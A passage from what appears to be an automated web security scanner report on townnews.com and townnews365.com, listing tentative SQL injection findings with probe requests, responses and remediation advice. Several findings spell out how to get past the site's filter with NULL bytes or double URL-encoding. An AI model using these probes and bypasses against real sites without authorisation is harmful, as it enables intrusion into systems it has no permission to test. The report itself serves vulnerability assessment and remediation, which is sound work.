GET /calendar/asset_manager/event_f229e406-7506-11e0-b056-001cc4c03286.html%2527 HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /calendar/asset_manager/event_f229e406-7506-11e0-b056-001cc4c03286.html%2527%2527 HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Sat, 14 May 2011 22:48:02 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: townnews.com
Content-Length: 680
Connection: close
X-Cache-Info: cached

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.8. http://www.townnews.com/calendar/banner_ad_manager/event_0cadbf96-771e-11e0-855c-001cc4c03286.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /calendar/banner_ad_manager/event_0cadbf96-771e-11e0-855c-001cc4c03286.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /calendar/banner_ad_manager'/event_0cadbf96-771e-11e0-855c-001cc4c03286.html HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /calendar/banner_ad_manager''/event_0cadbf96-771e-11e0-855c-001cc4c03286.html HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:47:44 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=4999
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 26464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" c
...[SNIP]...

2.9. http://www.townnews.com/calendar/business_directory_manager/event_d4277864-771e-11e0-9945-001cc4c03286.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /calendar/business_directory_manager/event_d4277864-771e-11e0-9945-001cc4c03286.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /calendar/business_directory_manager/event_d4277864-771e-11e0-9945-001cc4c03286.html' HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /calendar/business_directory_manager/event_d4277864-771e-11e0-9945-001cc4c03286.html'' HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Sat, 14 May 2011 22:47:46 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.10. http://www.townnews.com/calendar/search [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /calendar/search

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /calendar/search HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /calendar/search HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 301 Moved
Server: WWW
Content-Type: text/html; charset=utf-8
Date: Sat, 14 May 2011 22:47:36 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Location: /calendar/search/
Keep-Alive: timeout=300, max=4998
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 570

<!DOCTYPE html PUBLIC \"-//IETF//DTD HTML 2.0//EN\">
<html>
<head>
<title>301 Moved</title>
</head>
<body>
<script type='text/javascript' src='http://stats.townnews.com/shared-content/stats/common/tr
...[SNIP]...

2.11. http://www.townnews.com/content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html?1%00'=1 HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions/blogs/article_1383ef06-772e-11e0-920f-001cc4c03286.html?1%00''=1 HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 File Not Found
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:54 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=5000
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 24946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.12. http://www.townnews.com/content_management_solutions/blogs/article_ee26dd4e-6c25-11e0-afd7-001cc4c03286.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /content_management_solutions/blogs/article_ee26dd4e-6c25-11e0-afd7-001cc4c03286.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content_management_solutions%2527/blogs/article_ee26dd4e-6c25-11e0-afd7-001cc4c03286.html HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions%2527%2527/blogs/article_ee26dd4e-6c25-11e0-afd7-001cc4c03286.html HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 File Not Found
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:47:01 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=5000
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 24946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.13. http://www.townnews.com/content_management_solutions/calendar/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /content_management_solutions/calendar/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /content_management_solutions'/calendar/ HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content_management_solutions''/calendar/ HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 File Not Found
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:47:01 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=5000
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 24946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.14. http://www.townnews.com/favicon.ico [TNNoMobile cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /favicon.ico

Issue detail

The TNNoMobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the TNNoMobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the TNNoMobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /favicon.ico HTTP/1.1
Host: www.townnews.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1%2527

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /favicon.ico HTTP/1.1
Host: www.townnews.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1%2527%2527

Response 2

HTTP/1.1 200 OK
Server: WWW
Content-Type: image/x-icon
Date: Sat, 14 May 2011 22:23:09 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "50876973"
Last-Modified: Mon, 19 Oct 2009 15:48:42 GMT
Real-Hostname: townnews.com
Content-Length: 1150
Connection: Keep-Alive
X-Cache-Info: cached

............ .h.......(....... ..... ................................................................................................................................................j..................
...[SNIP]...

2.15. http://www.townnews.com/marketplace/business_434b7195-75b6-5eb4-bb91-74beeb7a6ba6.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /marketplace/business_434b7195-75b6-5eb4-bb91-74beeb7a6ba6.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /marketplace'/business_434b7195-75b6-5eb4-bb91-74beeb7a6ba6.html HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /marketplace''/business_434b7195-75b6-5eb4-bb91-74beeb7a6ba6.html HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 File Not Found
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:47:32 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=4999
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 24946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.16. http://www.townnews.com/search/ [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /search/

Issue detail

The l parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the l parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the l request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /search/?q=&t=article&l=100%2527&d=&d1=&d2=&s=start_time&sd=desc&c[]=content_management_solutions/blogs,content_management_solutions/blogs/*&f=rss HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /search/?q=&t=article&l=100%2527%2527&d=&d1=&d2=&s=start_time&sd=desc&c[]=content_management_solutions/blogs,content_management_solutions/blogs/*&f=rss HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 File Not Found
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:47:36 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=5000
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 24946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.17. http://www.townnews.com/topic/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /topic/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /topic/ HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /topic/ HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 404 File Not Found
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:47:30 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=4999
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 24946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.18. http://www.townnews.com/users/admin/calendar/event/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /users/admin/calendar/event/

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /users/admin/calendar/event%2527/ HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/admin/calendar/event%2527%2527/ HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 File Not Found
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:48:03 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=4999
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 24946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.19. http://www.townnews365.com/advertising_solutions/dotconnect_media [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /advertising_solutions/dotconnect_media

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /advertising_solutions/dotconnect_media HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /advertising_solutions/dotconnect_media HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:42:16 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages

2.20. http://www.townnews365.com/classified_solutions/employment_solutions/employment_classifieds/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /classified_solutions/employment_solutions/employment_classifieds/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /classified_solutions/employment_solutions/employment_classifieds/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /classified_solutions/employment_solutions/employment_classifieds/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 4084848
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:42:42 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.7148
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp1
Content-Length: 44642
Connection: close
X-Cache-Info: cached


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.21. http://www.townnews365.com/classified_solutions/employment_solutions/the_job_network/demonstration/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /classified_solutions/employment_solutions/the_job_network/demonstration/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /classified_solutions/employment_solutions/the_job_network/demonstration/?1'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /classified_solutions/employment_solutions/the_job_network/demonstration/?1''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 301 Moved Permanently
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2713224
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:43:40 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
Location: http://jobs.thejobnetwork.com/nphomepage.aspx?AffiliateId=3
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0774
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp16
Content-Length: 691

<!DOCTYPE html PUBLIC \"-//IETF//DTD HTML 2.0//EN\">
<html>
<head>
<base href="http://www.townnews365.com/content/tncms/live/" />

<title>301 Moved Permanently</title>
</head>
<body>
<script type='tex
...[SNIP]...

2.22. http://www.townnews365.com/classified_solutions/employment_solutions/top_jobs/demonstration [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /classified_solutions/employment_solutions/top_jobs/demonstration

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /classified_solutions/employment_solutions/top_jobs/demonstration HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1 (redirected)

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /classified_solutions/employment_solutions/top_jobs/demonstration HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2 (redirected)

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3645796
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:42:42 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.4444
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp2
Content-Length: 36695
Connection: close
X-Cache-Info: cached


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.23. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login1.jpg [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/login1.jpg

Issue detail

